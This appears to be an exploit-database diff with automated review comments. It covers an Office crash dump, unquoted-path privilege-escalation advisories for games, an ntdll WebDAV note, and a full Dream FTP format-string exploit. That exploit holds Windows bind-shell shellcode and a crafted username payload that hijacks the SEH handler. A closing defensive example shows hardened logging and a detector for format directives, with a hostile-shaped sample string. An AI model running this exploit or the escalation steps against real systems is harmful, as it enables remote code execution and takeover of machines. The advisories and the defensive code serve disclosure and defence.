if ((n = read(0, tmp, sizeof(tmp))) < 0) {
perror("read");
break;
}
if (write(fd, tmp, n) < 0) {
perror("write");
break;
}
}
}
close(fd);
exit(1);
}
/*
* read_prompt(): non-blocking read from fd
*/
int read_prompt(int fd, char *buf, int size)
{
fd_set fds;
struct timeval wait;
int n = -1;
/* set timeout */
wait.tv_sec = 2;
wait.tv_usec = 0;
bzero(buf, size);
FD_ZERO(&fds);
FD_SET(fd, &fds);
/* select with timeout */
if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
perror("select");
exit(1);
}
/* read data if any */
if (FD_ISSET(fd, &fds))
n = read(fd, buf, size);
return n;
}
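Review bot: the header `@ -1,574 +0,0 @@` records this file as deleted outright; if it is being moved to a new path rather than retired, commit it as a rename so history stays attached to the file, including the `$Id:` line, the securityfocus reference at the top, and the `Vulnerable platforms` block naming patches 108993-32 (Solaris 8) and 113476-11 (Solaris 9), which is the remediation reference a defender would consult. If the deletion is intended, the hunk itself gives no replacement; say which entry supersedes it.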

platforms/windows/dos/39819.txt Executable file

@ -0,0 +1,228 @@
Microsoft Office is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected application.
----------------------------------------------------------------------
Found : 11.05.2016
More: http://HauntIT.blogspot.com
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39819.zip
----------------------------------------------------------------------
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
CommandLine: "c:\Program Files\Microsoft Office\Office14\excel.EXE" C:\crash\sf_e626c69c89ab9e683eed52eeaaac93ca-109922.xlsx
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 30000000 313d1000 Excel.exe
ModLoad: 7c900000 7c9af000 ntdll.dll
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
(...)
ModLoad: 6bdc0000 6be7c000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
ModLoad: 65100000 6519e000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
(cb4.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\OGL.DLL -
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
0:000> r;!exploitable -v;r;ub;kv;q
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
(...)
Exception Faulting Address: 0x4
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Faulting Instruction:44175083 push dword ptr [ecx+4]
Basic Block:
44175083 push dword ptr [ecx+4]
Tainted Input operands: 'ecx'
44175086 push dword ptr [ecx]
Tainted Input operands: 'ecx'
44175088 mov ecx,dword ptr [ebp+8]
4417508b mov eax,dword ptr [ecx]
4417508d call dword ptr [eax+4]
Tainted Input operands: 'StackContents'
Exception Hash (Major/Minor): 0xd8abe4f2.0x3a6d64a1
Hash Usage : Stack Trace:
Major+Minor : OGL!GdipGetImageThumbnail+0x1118e
Major+Minor : OGL!GdipGetPathPointsI+0x2da6
Major+Minor : OGL!GdipGetPathPointsI+0x2b0e
Major+Minor : OGL!GdipGetPathPointsI+0x2a98
Major+Minor : GDI32!SetMetaRgn+0x87
Minor : OGL!GdipCreateMetafileFromWmfFile+0x652
Minor : OGL!GdipGetPathPointsI+0x2d1b
Minor : OGL!GdipGetPathPointsI+0x2b73
Minor : OGL!GdipCreateMetafileFromWmfFile+0x573
Minor : OGL!GdipGetVisibleClipBoundsI+0x1c6
Minor : OGL!GdipDrawImageRectRect+0x111
Minor : gfx+0x147d74
Minor : gfx+0x4f9f
Minor : gfx+0x13ec8
Minor : gfx+0x13ec8
Minor : gfx+0x13ec8
Minor : gfx+0x4ecd
Minor : gfx+0xed1a
Minor : gfx+0xecef
Minor : gfx+0xecc3
Minor : gfx+0xf6fc
Minor : gfx+0xe84d
Minor : gfx+0xf4db
Minor : gfx+0xe84d
Minor : gfx+0xf685
Minor : gfx+0xe817
Minor : gfx+0xebd8
Minor : oart!Ordinal3680+0xb8
Minor : oart!Ordinal1491+0x156
Minor : Excel!Ordinal40+0x20d620
Minor : Excel!Ordinal40+0x1f8e2c
Minor : Excel!Ordinal40+0x60961
Minor : Excel!Ordinal40+0x607aa
Minor : Excel!Ordinal40+0x5e95b
Minor : Excel!Ordinal40+0x5e76f
Minor : Excel!Ordinal40+0x2f054
Minor : Excel!Ordinal40+0x1763d
Minor : USER32!GetDC+0x6d
Minor : USER32!GetDC+0x14f
Minor : USER32!IsWindowUnicode+0xa1
Minor : USER32!CallWindowProcW+0x1b
Minor : Comctl32!Ordinal11+0x328
Minor : Comctl32!RemoveWindowSubclass+0x17e
Minor : Comctl32!DefSubclassProc+0x46
Minor : mso!Ordinal1888+0x38e
Minor : mso!Ordinal4894+0x24b
Minor : Comctl32!RemoveWindowSubclass+0x17e
Minor : Comctl32!DefSubclassProc+0xa9
Minor : USER32!GetDC+0x6d
Minor : USER32!GetDC+0x14f
Minor : USER32!DefWindowProcW+0x180
Minor : USER32!DefWindowProcW+0x1cc
Minor : ntdll!KiUserCallbackDispatcher+0x13
Minor : USER32!DispatchMessageW+0xf
Minor : Excel!Ordinal40+0x24572
Minor : Excel!Ordinal40+0x24441
Minor : Excel!Ordinal40+0x424b
Minor : Excel!Ordinal40+0x3f0a
Minor : kernel32!RegisterWaitForInputIdle+0x49
Instruction Address: 0x0000000044175083
Description: Read Access Violation near NULL
Short Description: ReadAVNearNull
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Read Access Violation near NULL starting at OGL!GdipGetImageThumbnail+0x000000000001118e (Hash=0xd8abe4f2.0x3a6d64a1)
This is a user mode read access violation near null, and is probably not exploitable.
----------------------------------------------------------------------
More:
> r
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
> ub
OGL!GdipGetImageThumbnail+0x1117b:
44175070 8b01 mov eax,dword ptr [ecx]
44175072 ff5004 call dword ptr [eax+4]
44175075 8bc8 mov ecx,eax
44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a)
4417507c 5d pop ebp
4417507d c21000 ret 10h
44175080 55 push ebp
44175081 8bec mov ebp,esp
> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0013e3a8 440787db 0ab4aea0 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e
0013e3c8 44078543 0000401d 00000000 00000000 OGL!GdipGetPathPointsI+0x2da6
0013e3f8 440784cd 0000015c 07915974 07915028 OGL!GdipGetPathPointsI+0x2b0e
0013e410 77f2067f 2f011136 012f2750 07915904 OGL!GdipGetPathPointsI+0x2a98
0013e490 44074c79 2f011136 404ccccc 4407840d GDI32!SetMetaRgn+0x87
0013e4c8 44078750 2f011136 3e460aa3 0013e548 OGL!GdipCreateMetafileFromWmfFile+0x652
0013e568 440785a8 43487fff 3e460aa3 0013e6a0 OGL!GdipGetPathPointsI+0x2d1b
0013e6b8 44074b9a 00000000 42c00000 42c00000 OGL!GdipGetPathPointsI+0x2b73
0013e7b4 4402cfc4 0ab4a320 00000000 00000000 OGL!GdipCreateMetafileFromWmfFile+0x573
0013e818 4403e16f 0ab4a320 0013e840 0013e850 OGL!GdipGetVisibleClipBoundsI+0x1c6
0013e888 438e7d74 00000000 00000000 00000000 OGL!GdipDrawImageRectRect+0x111
0013e998 437a4f9f 0874a780 07aeec68 ad01865f gfx+0x147d74
0013ea64 437b3ec8 0874a780 00000001 0722b898 gfx+0x4f9f
0013ea78 437b3ec8 0874a780 00000000 0722b848 gfx+0x13ec8
0013ea8c 437b3ec8 0874a780 0013eb40 0b06f120 gfx+0x13ec8
0013eaa0 437a4ecd 0874a780 ad018713 0013ee04 gfx+0x13ec8
0013eb28 437aed1a 0722b848 0013eb40 0013f194 gfx+0x4ecd
0013eb70 437aecef 0b06f120 0013ebac 0013f194 gfx+0xed1a
0013eb88 437aecc3 086f2410 0013ebac 0013f194 gfx+0xecef
0013ebf4 437af6fc 0013ec80 086f2410 00000002 gfx+0xecc3
----------------------------------------------------------------------
0:000> u eip
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4]
44175086 ff31 push dword ptr [ecx]
44175088 8b4d08 mov ecx,dword ptr [ebp+8]
4417508b 8b01 mov eax,dword ptr [ecx]
4417508d ff5004 call dword ptr [eax+4]
44175090 8bc8 mov ecx,eax
44175092 e8922bebff call OGL!GdipDeletePen+0x115 (44027c29)
44175097 5d pop ebp
0:000> kvn1
# ChildEBP RetAddr Args to Child
00 0013e308 440787db 08f22870 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e
0:000> dd ecx+4
00000004 ???????? ???????? ???????? ????????
00000014 ???????? ???????? ???????? ????????
00000024 ???????? ???????? ???????? ????????
00000034 ???????? ???????? ???????? ????????
00000044 ???????? ???????? ???????? ????????
00000054 ???????? ???????? ???????? ????????
00000064 ???????? ???????? ???????? ????????
00000074 ???????? ???????? ???????? ????????
0:000> u eip-11
OGL!GdipGetImageThumbnail+0x1117d:
44175072 ff5004 call dword ptr [eax+4]
44175075 8bc8 mov ecx,eax
44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a)
4417507c 5d pop ebp
4417507d c21000 ret 10h
44175080 55 push ebp
44175081 8bec mov ebp,esp
44175083 ff7104 push dword ptr [ecx+4] <= crash
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
----------------------------------------------------------------------
By: HauntIT Blog @ 2016
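Review bot: the triage is done against export symbols only (`Symbol search path is: *** Invalid ***` and `Defaulted to export symbols for ... OGL.DLL`), so `OGL!GdipGetImageThumbnail+0x1118e` is an offset from the nearest exported name, not the faulting function, and the `Exception Hash` and `Recommended Bug Title` derived from it will not match a run with proper symbols; rerun with `.symfix` and `.reload`, as the debugger banner itself suggests, before recording the bug title. The affected product version appears only implicitly in the `CommandLine` path (`Office14`), so add an explicit version line to the header. Note also that the `kvn1` frame (`ChildEBP 0013e308`, first arg `08f22870`) differs from the `kv` frame (`0013e3a8`, `0ab4aea0`), so the second block of output comes from a separate session; label it as such so the two traces are not read as one run.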


@ -0,0 +1,34 @@
-----------------------------------------------------------------------------------------------------------------
# Exploit Title: Multiples Nexon Games - Privilege Escalation Unquoted path vulnerabilities
# Date: 13/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://www.nexon.net/
# Softwares Links: http://dirtybomb.nexon.net/ (DirtyBomb)
# http://store.steampowered.com/app/273110/ (CSNZ)
# Versions: Dirty Bomb r56825 USA_EU / CSNZ : 0.0.18845.1
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
Description : Multiples Nexon Game, including but not limited to Dirty Bomb
and Counter-Strike Nexon : Zombies, are Prone to unquoted path
vulnerability. They fail to quote correctly the command that call for
BlackXcht.aes, which is a part of the anti-cheat system (Nexon Game
Security). Probably all Nexon games calling this file are affected.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.
POC :
Put a software named Program.exe in C:
Launch the game via steam
When BlackXcht.aes is called, Program.exe is executed with same rights as
steam
POC video : https://www.youtube.com/watch?v=wcn62GGwtcQ
Patch :
Patch for Dirty bomb - Upgrade to r57457 USA_EU
-----------------------------------------------------------------------------------------------------------------
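Review bot: the impact statement ("execute arbitrary code with elevated privileges") is not supported by the POC, which says `Program.exe is executed with same rights as steam`; unless the launcher or the BlackXcht.aes component runs under a privileged account or as a service, this is execution at the invoking user's level, and the advisory should state under which account the unquoted command runs. The POC also depends on writing `Program.exe` to `C:\`, which default ACLs on Windows 7 deny to standard users, so record which account placed the file. Finally, CSNZ 0.0.18845.1 is listed as affected but the `Patch` section covers only Dirty Bomb r57457; record the CSNZ fix status.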


@ -0,0 +1,38 @@
-----------------------------------------------------------------------------------------------------------------
# Exploit Title: Hex : Shard of Fate 1.0.1.026 - Privilege
Escalation Unquoted path vulnerability
# Date: 15/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://gameforge.com
# Software Link: https://hex.gameforge.com/ or via steam
# Version: 1.0.1.026 and probably prior
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
Summary : Hex: Shard of Fate is a new breed of digital card game, combining
classic TCG gameplay with elements of an online RPG
Description : The game executable is prone to an unquoted path
vulnerability. When you go to the in-game store it fail to quote the
following command which is used multiple times :
C:/Program Files (x86)/Steam/steamapps/common/HEX SHARDS OF
FATE/Hex_Data/StreamingAssets/uWebKit/Windows/x86/UWKProcess.exe -parentpid
5808
-processdb QzovVXNlcnMvVXRpbGlzYXRldXIvQXBwRGF0YS9Mb2NhbExvdy9IRVggRW50ZXJ0YWlubWVu
dC9IZXgvdVdlYktpdFByb2Nlc3MuZGI=
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system.
POC :
Put a software named Program.exe in C:
Launch the game or steam with high privileges and go to store
POC video : https://www.youtube.com/watch?v=E1_1wZea1ck
Patch :
Still waiting, no reward so full disclosure after 10 days
-----------------------------------------------------------------------------------------------------------------
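Review bot: the POC step `Launch the game or steam with high privileges and go to store` is the precondition that the header's `Privilege Escalation` claim leaves out: the unquoted `UWKProcess.exe` command runs at whatever privilege the launcher already holds, so this is only an escalation when a privileged account starts the game; state that condition alongside the title. Placing `Program.exe` in `C:\` likewise needs write access to the drive root, which standard users lack by default on Windows 7. The quoted command also embeds a per-install value: the base64 `-processdb` argument decodes to a path under the user's `AppData/LocalLow`, so note that it varies between machines rather than presenting it as a fixed part of the command.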


@ -1,3 +1,5 @@
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: http://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.


@ -1,3 +1,5 @@
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: http://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.


@ -1,102 +0,0 @@
source: http://www.securityfocus.com/bid/9600/info
It has been reported that Dream FTP Server may be prone to a remote format string vulnerability when processing a malicious request from a client for a username during FTP authentication. The issue could crash the server.
Dream FTP Server version 1.02 has been reported to be prone to this issue, however, it is possible that other versions may be affected by this issue as well.
#include <stdio.h>
#include <stdlib.h>      // exit, atoi
#include <string.h>      // strstr
#include <unistd.h>      // close
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   // inet_addr

// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode =
    "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
    "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
    "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
    "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
    "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
    "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
    "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
    "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
    "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
    "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
    "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
    "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
    "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
    "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
    "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
    "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
    "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
    "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
    "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
    "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
    "\x83\xc4\x5c\x61\xeb\x89";

int main(int argc, char *argv[], char *envp[]) {
    int sock;
    FILE* FILEsock;
    struct sockaddr_in addr;
    int port = 21;              // default FTP control port
    char buffer[1024];

    if (argc<2 || argc>3) {
        printf("Usage: %s IP [PORT]\n", argv[0]);
        exit(-1);
    }
    if (argc == 3) port = atoi(argv[2]);

    printf("- Nightmare --------------------------------------------------\n"
           " Dream FTP v1.2 formatstring exploit.\n"
           " Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
           " Credits for the vulnerability go to badpack3t\n"
           " <badpack3t@security-protocols.com>.\n"
           " Shellcode based on work by H D Moore (www.metasploit.com).\n"
           " Greets to everyone at 0dd and #netric.\n"
           " (K)(L)(F) for Suzan.\n"
           "\n"
           " Binds a shell at %s:28876 if successfull.\n"
           " Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP 1.0.0.1)\n"
           "--------------------------------------------------------------\n",
           argv[1]);

    // Open a TCP connection to the FTP control port and wrap it in a FILE*
    // so the banner can be read line by line with fgets().
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(argv[1]);
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
        connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 ||
        (FILEsock = fdopen(sock, "r+")) == NULL) {
        fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port);
        perror(NULL);
        exit(-1);
    }
    printf("\n[+] Connected to %s:%d.\n", argv[1], port);

    // Consume the (possibly multi-line) 220 greeting; continuation lines
    // begin with "220-".
    do printf(" --> %s", fgets(buffer, sizeof buffer, FILEsock));
    while (strstr(buffer, "220-") == buffer);

    printf("\n[+] Sending exploit string...\n");
    fprintf(FILEsock,
            // Argument 10 points to the SEH handler code, it's RWE so we'll change
            // the SEH handler to redirect execution to the beginning of our
            // formatstring. When the SEH handler is called [ebx+0x3c] points
            // to the start of our formatstring, we just have to jump over the
            // formatstring exploit itself to our shellcode:
            "\xeb\x29"                                  // Jump over the formatstring exploit
            "%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n"  // Argument 10 -> SEH
            "%%n"                                       // Causes exception after SEH adjustment.
            "@@@@@@@@"                                  // nopslide landing zone for jump
            "%s\r\n",                                   // shellcode
            0x3C63FF-0x4f,  // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C])
            shellcode);
    fflush(FILEsock);
    close(sock);

    printf("\n[+] Done, allow a few seconds on a slow target before you can\n"
           " connect to %s:28876.\n", argv[1]);
    return 0;
}
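The bug described in the advisory above, seen from the server side, as an added example that is not part of the original advisory or of SkyLined's exploit: the logging pattern in which a client-supplied username becomes the format string, the hardened form that passes the username only as data, and a check that a server or an inspection rule can run on inbound USER values. All function names are hypothetical; the sample strings are constructed, one of them with the shape of the string the exploit above sends as the username.

```c
/* Added example, not part of the original advisory or exploit: the
 * server-side pattern behind a username format-string bug, its hardened
 * form, and a check for format directives in untrusted input.
 * All function names are hypothetical. */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: the client-supplied username is used as the format
 * string itself, so "%x" reads the stack and "%n" writes to memory.
 * (The pragmas only silence the compiler warning that flags this mistake;
 * that warning is itself a useful check in a build.) */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int log_login_vulnerable(char *out, size_t outlen, const char *user) {
    return snprintf(out, outlen, user);
}
#pragma GCC diagnostic pop

/* Hardened form: a literal format, the username passed only as data. */
int log_login_hardened(char *out, size_t outlen, const char *user) {
    return snprintf(out, outlen, "USER %s", user);
}

/* Format the username with the hardened routine and report whether the
 * result equals `expected` (directives must survive as literal text). */
int hardened_output_equals(const char *user, const char *expected) {
    char buf[128];
    log_login_hardened(buf, sizeof buf, user);
    return strcmp(buf, expected) == 0;
}

/* Count conversion directives in an untrusted string; "%%" is a literal
 * percent sign, not a directive. A username needs none, so any non-zero
 * count is worth logging or rejecting. */
int count_format_directives(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* escaped percent */
        n++;
    }
    return n;
}

/* Report whether any directive is "%n", the one that writes memory; flags,
 * width, precision and length modifiers between '%' and 'n' are skipped. */
int has_write_directive(const char *s) {
    const char *p = s;
    while (*p) {
        if (*p != '%') { p++; continue; }
        p++;                                   /* step past '%' */
        if (*p == '%') { p++; continue; }      /* escaped percent */
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p)) p++;
        if (*p == 'n') return 1;
        if (*p) p++;                           /* consume the conversion char */
    }
    return 0;
}

int main(void) {
    /* Constructed samples: a normal login, and a string with the shape of
     * the one the exploit above sends as the username. */
    const char *benign = "alice";
    const char *hostile = "%8x%8x%8x%8x%8x%8x%8x%8x%3957680d%n%n";
    char buf[128];

    log_login_hardened(buf, sizeof buf, hostile);
    printf("hardened log line: %s\n", buf);
    printf("%s: %d directives, %%n present: %d\n", benign,
           count_format_directives(benign), has_write_directive(benign));
    printf("hostile: %d directives, %%n present: %d\n",
           count_format_directives(hostile), has_write_directive(hostile));
    return 0;
}
```

The hardened routine never interprets the username, so the hostile sample is logged verbatim as "USER %8x...%n%n" rather than executed as a format; the two check functions are the kind of thing a server can apply before authentication, or a log-inspection rule can apply to recorded USER commands, to surface attempts against this class of bug.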